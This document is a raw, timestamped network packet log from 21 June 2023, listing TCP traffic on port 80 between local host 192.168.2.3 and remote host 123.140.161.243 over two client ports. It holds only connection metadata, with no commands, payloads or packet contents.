Jun 21, 2023 04:27:50.165393114 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165393114 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165400982 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165424109 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165431023 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165457964 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165462017 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165489912 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165496111 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165517092 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165517092 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165543079 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165545940 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165563107 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165574074 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165595055 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165613890 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165637970 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165642977 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165671110 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.165692091 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.165715933 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.167349100 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.167376995 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.167402983 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.167427063 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.167449951 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.167449951 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.167490959 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.204230070 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204284906 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204312086 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204338074 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204365015 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204391003 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204416990 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.204416990 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204416990 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.204444885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204447985 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.204469919 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204495907 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.204543114 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.204543114 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205204964 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205295086 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205343962 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205369949 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205396891 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205424070 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205436945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205436945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205451012 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205477953 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205503941 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205529928 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205529928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205529928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205557108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205583096 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205610037 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205624104 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205624104 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205636024 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205662966 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205688000 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205713987 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205729961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205729961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205739975 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205768108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205795050 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205806971 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205821991 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205838919 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205847979 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205874920 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205900908 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205926895 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205945015 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205945015 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.205954075 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.205981970 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206007957 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206033945 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206048965 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.206048965 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.206060886 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206085920 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206111908 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.206160069 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.206723928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.209646940 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.209678888 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.209705114 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.209728956 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.209754944 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.209846020 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.252734900 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.252787113 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.252814054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.252842903 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.252937078 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.252938032 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.354630947 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.404907942 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.404946089 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405086994 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405113935 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405142069 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405152082 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405152082 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405169964 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405195951 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405222893 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405225039 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405225992 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405225992 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405250072 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405275106 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405277014 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405298948 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405303955 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405319929 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405333042 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405354023 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405358076 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405385017 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405409098 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405416965 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405438900 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405452967 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405473948 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405478954 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405519962 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405527115 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405545950 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405596972 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405618906 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405661106 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405668020 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405700922 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405726910 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405754089 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405755997 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405774117 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405822039 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405848980 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405873060 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405879974 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405900002 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405900955 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405925035 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405926943 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405942917 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.405962944 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405982018 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.405982018 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406004906 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406007051 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406023026 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406053066 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406594992 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406637907 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406666994 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406682014 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406692982 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406735897 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406739950 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406765938 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406788111 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406790972 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406809092 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406819105 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406847000 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.406850100 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406869888 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.406893969 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.419887066 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.454663992 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454705954 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454730988 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454756975 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454783916 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454809904 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454835892 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.454842091 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454866886 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454878092 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.454878092 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.454893112 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454919100 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454943895 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454968929 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454993010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.454999924 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.454999924 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455022097 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455048084 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455049992 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455074072 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455099106 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455123901 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455123901 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455123901 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455147982 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455174923 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455200911 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455228090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455228090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455239058 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455265999 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455291986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455317020 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455342054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455363989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455363989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455367088 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455394030 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455419064 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455444098 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455466032 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455466032 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455468893 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455496073 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455501080 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455526114 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455550909 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455575943 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455579042 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455601931 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455627918 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455648899 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455648899 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455652952 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455678940 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455703974 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455729961 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.455753088 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.455753088 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.457420111 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.457489967 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.457514048 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.457540035 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.457592964 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.457694054 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.500705957 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.500756025 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.500781059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.500804901 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.501046896 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.505908966 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.645788908 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.645858049 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.645889044 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.645920038 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.645951986 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.645981073 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646009922 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646037102 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646066904 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646096945 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646101952 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646101952 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646101952 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646101952 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646126986 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646159887 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646179914 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646179914 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646179914 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646188974 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646208048 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646220922 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646238089 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646253109 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646279097 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646284103 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646298885 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646315098 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646339893 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646343946 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646357059 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646374941 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646392107 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646404982 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646435022 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646435976 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646456957 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646466970 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646492004 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646497011 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646521091 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646542072 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646544933 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646574020 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646594048 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646604061 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646625996 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646636009 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646661043 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646667004 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646678925 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646698952 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646722078 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646729946 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646743059 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646761894 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646780968 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646792889 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646806002 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646822929 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646842003 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646853924 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646866083 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646883965 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646913052 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646919012 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646939039 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646940947 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646959066 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646969080 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.646992922 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.646996975 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647018909 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647027016 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647057056 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647058964 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647082090 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647089958 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647100925 CEST	49714	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:50.647119999 CEST	80	49714	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:50.647139072 CEST	49714	80	192.168.2.3	123.140.161.243
